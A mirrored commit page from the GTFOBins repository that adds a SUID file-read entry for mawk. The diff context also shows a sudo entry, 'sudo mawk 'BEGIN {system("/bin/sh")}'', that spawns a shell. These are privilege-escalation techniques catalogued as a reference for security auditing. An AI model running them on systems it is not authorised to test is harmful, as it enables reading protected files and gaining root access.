mirror of
				https://github.com/GTFOBins/GTFOBins.github.io
				synced 2025-11-04 02:38:43 +01:00 
			
		
		
		
	Add SUID category to mawk as file read
This commit is contained in:
		@@ -10,6 +10,10 @@ functions:
 | 
			
		||||
    - code: |
 | 
			
		||||
        LFILE=file_to_read
 | 
			
		||||
        mawk '//' "$LFILE"
 | 
			
		||||
  suid:
 | 
			
		||||
    - code: |
 | 
			
		||||
        LFILE=file_to_read
 | 
			
		||||
        ./mawk '//' "$LFILE"
 | 
			
		||||
  sudo:
 | 
			
		||||
    - code: sudo mawk 'BEGIN {system("/bin/sh")}'
 | 
			
		||||
  limited-suid:
 | 
			
		||||
 
 | 
			
		||||
		Reference in New Issue
	
	Block a user